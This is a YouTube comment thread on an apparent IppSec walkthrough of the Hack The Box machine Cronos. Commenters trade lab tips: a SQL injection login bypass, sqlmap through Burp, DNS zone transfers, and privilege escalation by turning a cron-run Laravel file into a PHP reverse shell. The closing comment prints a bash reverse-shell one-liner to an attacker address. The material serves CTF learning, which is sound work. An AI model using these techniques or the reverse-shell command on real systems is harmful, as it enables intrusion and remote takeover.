Also, just a tip, proxy sqlmap through burp, so when it gets the redirect you can look at the last request in HTTP history and thus find the particular input that was successful.
I'm so impressed with how you did the priv esc...I just used pspy, saw that it was running php /var/www/laravel/artisan and edited artisan to be a php reverse shell
@SmartySmarter il y a 0 seconde Yes I’m 😂 I manage a team of Pentesters and work on helping developers understand and fix vulnerability which is the hardest part.
IppSec well that is much appreciated! Wanted to make sure I was on the right track myself.... I just learned how to enable tab complete from you and I can tell you your little "by the way" tips like that are priceless
It's not a big deal, but if you want lo wait for the minute to pass you can use the command *watch(1)* that executes a program periodically, showing output fullscreen.
Essentially what mkfifo is doing -- It's not my first option in CTF's because anyone can read or direct content into the files. So it's quite easy to get trolled in CTF's when depending on a file for your reverse shell.
I’m having issues with compiling c script. Can’t execute on cron with error “/lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found” the glibc version on cron is 2.23, I’m not good with c at all, does anyone have a solution to installing an older version to make it compile correctly? Can you update alternatives like python versions?
I did not think of doing a sqli. Instead I fuzzed for files in admin.cronos.htb/ with .php extensions and found welcome.php which was a 302. I replayed the request in burp and found that it yields an html body containing the form. I simply issued a post request to /welcome.php with post data 'command' which worked well. That 'command' parameter can be read from the html output. The requests are completely unauthenticated. May be something box creator missed . BTW I enjoyed your video !
Amazing. Thanks for the alternative method. I got the root using the reverse nc but that's just too mainstream. Btw for anybody having trouble getting that tty to spawn (since for me it did not want to spawn using like 10 methods) - remember there is always vi which can be used for that as well.
can someone explain to me why running 'cat /etc/passwd > test.txt' doesn't work , but we can run commands like chmod/touch/mkdir? also, did anyone get a reverse shell from Kernel.php and not artisan?
Whenever you come across 53/open TCP port, you may want to test for zone transfer (command: dig axfr @ ) because it may leak domains/subdomains which could potentially lead you to completely different websites due to virtual host routing.
Hey, thanks for uploading another walkthrough! I love how you also include the times things don't go as intended. There was one thing I was kind of confused about, however. Why were you able to log in to the admin panel after running SQLMap? What did it do?
The SQL Query for login is probably similar to: > Select * from login where username = '$username' and password = '$password'; I changed the query to: > Select * from login where username = '$username'-- -' and password = 'doesnotmatter' So ' -- - will close out the quote, then insert a comment so the rest of the query is ignored.
I just did the box and finished it and then watched your video. why didn't you just edit the artisan file? It's owned by www-data and you have permissions to edit it. Just replacing it with a php reverse shell would have done the trick. Also, you can do nmap -vvvv [...] so you'd see the sent requests/received responses too, frankly enough even the payload is given in clear text there. Finally, Thank you for your video.
I actually figured it out just after asking. Apparently nano is really fussy when in a remote shell. I tried it with vi and it worked. Thanks for the video and assistance!
Is there a particular reason for manually copying the request and saving it for sqlmap? Right-click + save to file seems to work fine... But only works if "base 64 encode" is checked in the save to file dialog box.
Thanks for the video. How you noticed that we need to add extra - to the following: admin' -- This part was not quite clear as quite hard to depend on guessing. Thanks again
The NetSecFocus Slack is the best place for that, I prefer to keep comments here spoiler free. Just be sure to keep any discussion about machines to Direct Messages. If you ask someone to ping you about a machine, normally you'll get a response.
Also, just a tip, proxy sqlmap through burp, so when it gets the redirect you can look at the last request in HTTP history and thus find the particular input that was successful.
You could also do sqlmap -vvvv
this way you see the sent request and the received response, too.
You know, sometimes it's the little things, like learning that "cd -" allows you to go to your previous directory, that make happy.
.. works too btw, as in dot dot (maybe not on mac, im not sure)
Ctrl+ a to go back to first char of line
I'm so impressed with how you did the priv esc...I just used pspy, saw that it was running php /var/www/laravel/artisan and edited artisan to be a php reverse shell
I did the same thing as you haha and decided to watch anyway and love how in depth he got with it.
I just directly copied the root.txt file to /tmp and changed the permission to read it xD
That was my first instinct as well lol
Same
Man ! i'm junior pentester and i did learn a lot from you , thank you
Are you senior now?
@SmartySmarter
il y a 0 seconde
Yes I’m 😂 I manage a team of Pentesters and work on helping developers understand and fix vulnerability which is the hardest part.
@@hamzakhiate1767 awesome! Congrats, man!
Wasn't the C shell a bit excessive, rather than just sending over nc, or using some other reverse oneliner?
Thank you Ippsec. Today I have learned a lot by this machine. Keep up the good work
why not have the scheduled task execute a reverse shell back? Wouldn't that have given you root?
Just to avoid using the same technique constantly.
IppSec well that is much appreciated! Wanted to make sure I was on the right track myself....
I just learned how to enable tab complete from you and I can tell you your little "by the way" tips like that are priceless
Ippsec what for terminal layout are you/tools to switch between different terminal tabs? Btw greate video's / walkthrough you are making.
It is tmux -- I believe I talk about it in the first HTB video
It's not a big deal, but if you want lo wait for the minute to pass you can use the command *watch(1)* that executes a program periodically, showing output fullscreen.
Hi, does anyone understand the dns part he is doing? Why is the purpose of running nslookup and dig axfr?
My SQL map failed even though i was following the exact output of the Burp any idea why guys ?
@IppSec in my opinion, the better idea of sending a reverse shell is just simply backpipe ^_^
Essentially what mkfifo is doing -- It's not my first option in CTF's because anyone can read or direct content into the files. So it's quite easy to get trolled in CTF's when depending on a file for your reverse shell.
that's true but i chosed backpipe cuz of that that it is build in thing XD
maquina
I’m having issues with compiling c script. Can’t execute on cron with error “/lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found” the glibc version on cron is 2.23, I’m not good with c at all, does anyone have a solution to installing an older version to make it compile correctly? Can you update alternatives like python versions?
I'm late but I got it to work by modifying artisan with a rev shell.
who makes the boxes
People on HTB can create them.
@IppSec you are awesome!
Please continue to solve more machines!
Can someone explain to me why he needed to create the C program??
really nice..
I am having a very hard time editing files within a meterpreter session. Can somebody give me a tip?
nano screws up everything and you have to use " stty raw -echo "
what about Granny
Plan on doing that one when another gets retired, and combine videos.
I cant explain how amazing your videos are...you literally answer questions as im asking them in my head
I did not think of doing a sqli. Instead I fuzzed for files in admin.cronos.htb/ with .php extensions and found welcome.php which was a 302. I replayed the request in burp and found that it yields an html body containing the form. I simply issued a post request to /welcome.php with post data 'command' which worked well. That 'command' parameter can be read from the html output. The requests are completely unauthenticated. May be something box creator missed . BTW I enjoyed your video !
that's something interesting
That's really cool, nice find!
Thank you IppSec
will you ever do a course only on privilege escalation?
back on the day when medium machine was quite easy, now the easy machine are double the difficulty
Your post Exploitation is art
Amazing. Thanks for the alternative method. I got the root using the reverse nc but that's just too mainstream. Btw for anybody having trouble getting that tty to spawn (since for me it did not want to spawn using like 10 methods) - remember there is always vi which can be used for that as well.
That sqlmap method of just giving it the request...beautiful
can someone explain to me why running 'cat /etc/passwd > test.txt' doesn't work , but we can run commands like chmod/touch/mkdir? also, did anyone get a reverse shell from Kernel.php and not artisan?
When it redirects me to out of scope urls.
Me *shit it's an original page i can't attack it*
Ippsec *I dOnT wAnT tO aTTaCk tHis sIte baCK oFF*
I don't understand the whole DNS part. Do you have any resource that clarify that?
Whenever you come across 53/open TCP port, you may want to test for zone transfer (command: dig axfr @ ) because it may leak domains/subdomains which could potentially lead you to completely different websites due to virtual host routing.
Hey, thanks for uploading another walkthrough! I love how you also include the times things don't go as intended. There was one thing I was kind of confused about, however. Why were you able to log in to the admin panel after running SQLMap? What did it do?
The SQL Query for login is probably similar to:
> Select * from login where username = '$username' and password = '$password';
I changed the query to:
> Select * from login where username = '$username'-- -' and password = 'doesnotmatter'
So ' -- - will close out the quote, then insert a comment so the rest of the query is ignored.
Are there any issues using Burp Pro across multiple Kali VMs, with a single user license?
I just did the box and finished it and then watched your video.
why didn't you just edit the artisan file? It's owned by www-data and you have permissions to edit it. Just replacing it with a php reverse shell would have done the trick.
Also, you can do nmap -vvvv [...] so you'd see the sent requests/received responses too, frankly enough even the payload is given in clear text there.
Finally, Thank you for your video.
What was the hot key in Burp you did you URL encode the string?
I think it is CTRL U . He mentioned it in the video,
Why is it necessary to percent-encoding the password?
Hey IppSec. How did you edit the Kernel.php file? On the VM, it doesn't appear to be world writeable. The only permissions on it are for root. Thanks!
Revert the machine. It should be world-writeable, perhaps you have the wrong file. The one i edit is in /var/www/laravel/app/Console
I actually figured it out just after asking. Apparently nano is really fussy when in a remote shell. I tried it with vi and it worked. Thanks for the video and assistance!
@@ippsec not able to edit the file Kernel.php vim or vi is not going in insert mode
@@ippsec stty raw -echo give Strange output behavior up down right left key giving some different output
Thanks for these videos ... You are master of your craft
thanks ... learning a lot from you ,,,,
Well done, thanks !
Do you know where can I download the same version of this Torrent app? tks
Is there a particular reason for manually copying the request and saving it for sqlmap? Right-click + save to file seems to work fine... But only works if "base 64 encode" is checked in the save to file dialog box.
Mainly just didn’t want to show my filesystem as I wasn’t sure if I kept it spoiler free
You use dirbuster in this case but I've seen you use gobuster in other cases. Is there a reason why you didn't use gobuster this time?
he said he likes to switch it up as relying on only one tool isn't a good practice
Thanks for the video. How you noticed that we need to add extra - to the following: admin' -- This part was not quite clear as quite hard to depend on guessing. Thanks again
An sql comment is -, the last - is just there so I can see the space
@@ippsec awesome, Thanks alot ippSec. You are d Best Buddy
Thanks for the video. One quick question, on what basis you decided to encode at 11.57min?
Decode the cookie you mean? I just saw it was encoded so I wanted to decode it
@@ippsec not cookie, that command value part of encoding.
what keystroke combination did he use to bring the shell to the foreground at 12:28?
fg
@@padaloni thank you
excuse, but can I ask you about some question of another machines?
The NetSecFocus Slack is the best place for that, I prefer to keep comments here spoiler free. Just be sure to keep any discussion about machines to Direct Messages. If you ask someone to ping you about a machine, normally you'll get a response.
thanks, are you on slack too? i cant find you on it.
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.*/9002 0>&1
That's the best hint I will give anyone that's looking to do this as of 10/2019